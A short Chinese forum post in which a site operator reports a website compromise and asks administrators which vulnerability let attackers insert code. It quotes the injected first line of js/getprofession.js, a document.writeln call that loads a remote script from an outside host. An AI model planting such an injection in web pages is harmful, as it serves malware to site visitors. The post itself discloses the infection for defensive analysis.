今天被挂了另一种马,发出来让管理员研究一下,希望能帮助大家!
经过层层筛选,确定感染目录为js/getprofession.js文件,在文件的第一行加入了“document.writeln('<script id="seraph5script57" type="text/javascript" src="http://www.cuaa.net/member/member/file/ru%78in.js" language="JavaScript"><\/script>');”
管理员研究一下,是通过什么漏洞加入的代码,谢谢 让黑客去死吧 http://bbs.finereason.com/viewthread.php?tid=21348&page=1#pid38132
页:
[1]